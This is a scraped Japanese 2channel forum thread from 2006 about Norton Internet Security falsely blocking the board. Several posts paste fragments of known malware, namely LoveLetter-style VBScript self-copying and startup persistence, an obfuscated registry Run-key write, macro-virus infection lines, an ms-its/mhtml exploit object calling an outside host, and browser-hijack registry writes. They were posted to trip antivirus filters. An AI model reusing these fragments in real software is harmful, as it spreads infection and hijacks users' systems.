詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
ノートン誤作動対策本部
レス数が950を超えています。1000を超えると書き込みができなくなります。
1動け動けウゴウゴ2ちゃんねる
2005/11/28(月) 16:08:40ID:bR9gbCGm02006/07/09(日) 11:57:57ID:kh5GFJWj0
2006/07/09(日) 14:39:36ID:t51lbUR70
まあとにかくNIS2004だと相変わらず反応するわけだ
972960
2006/07/09(日) 15:08:39ID:1L5D8Za90 >>971 レスthx
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。
973960
2006/07/09(日) 15:36:17ID:1L5D8Za90 連投すまそ、
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz
2006/07/09(日) 19:43:03ID:xL1TwppA0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
975動け動けウゴウゴ2ちゃんねる
2006/07/11(火) 20:28:47ID:ic76RAqx0 今まで>>974みたいのを専ブラでNGワードに指定していたら、
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。
2006/07/12(水) 02:08:08ID:YkmmZvA40
専ブラったっていろいろあるから
NGワードの処理の仕方も同じじゃない
NGワードの処理の仕方も同じじゃない
2006/07/12(水) 09:33:42ID:UPljDXSZ0
専ブラは変えてないなら
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ)
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ)
2006/07/12(水) 18:52:17ID:KcXuCgUg0
シリア語ブラクラでノートンが誤反応するのか??
979977
2006/07/12(水) 20:53:52ID:UPljDXSZ0 ごめん、シリア語ブラクラはノートンとは関係ないね。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。
2006/07/16(日) 22:37:21ID:ofCNhrjG0
t2.WriteLine('"Search Bar"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm";');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm";');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
2006/07/19(水) 12:50:11ID:7373/lmb0
レス数が950を超えています。1000を超えると書き込みができなくなります。
ニュース
- 「消えたコメ」茶わん26億杯分 在庫分散、国も把握できず [おっさん友の会★]
- 【埼玉】八潮市の交差点で道路が陥没しトラック落下、穴が直径40m以上に拡大…運転手救出へスロープ設置工事始まる★65 [Ailuropoda melanoleuca★]
- 【国際】トランプ氏、ワシントン空中衝突は「多様性」のせい [夜のけいちゃん★]
- 都内に潜伏中の中居正広をキャッチしたカメラマン激白!「根元の白髪が目立っていた」「さらに痩せた」 [ネギうどん★]
- 中居正広さんトラブル、文春 “訂正” の波紋 街の人「直すくらいなら書くなよ」「メディア不信に」厳しい声 [ネギうどん★]
- 中居正広氏 フジテレビから「100億円賠償」請求も 第三者委員会の結論次第で ★2 [阿弥陀ヶ峰★]
- サム・バンクマン、トランプ恩赦か [667744927]
- お昼休みなので>>2のキャラをかいてあそぶ
- 【悲報】OpenAI「評価額が倍になります!ソフバンが投資してくれれば」孫正義「…」トランプ「おい」孫正義「」ビクッ [323529167]
- 政府「助けてー!お米17万トン(お茶わん26億杯分)が行方不明なの!」 [256556981]
- ちんちんぶるぶるブルーアーカイブ🏡
- 国民健康保険料(税)👈これ実際に医療費10割負担より払ってるやつ多いよな [943688309]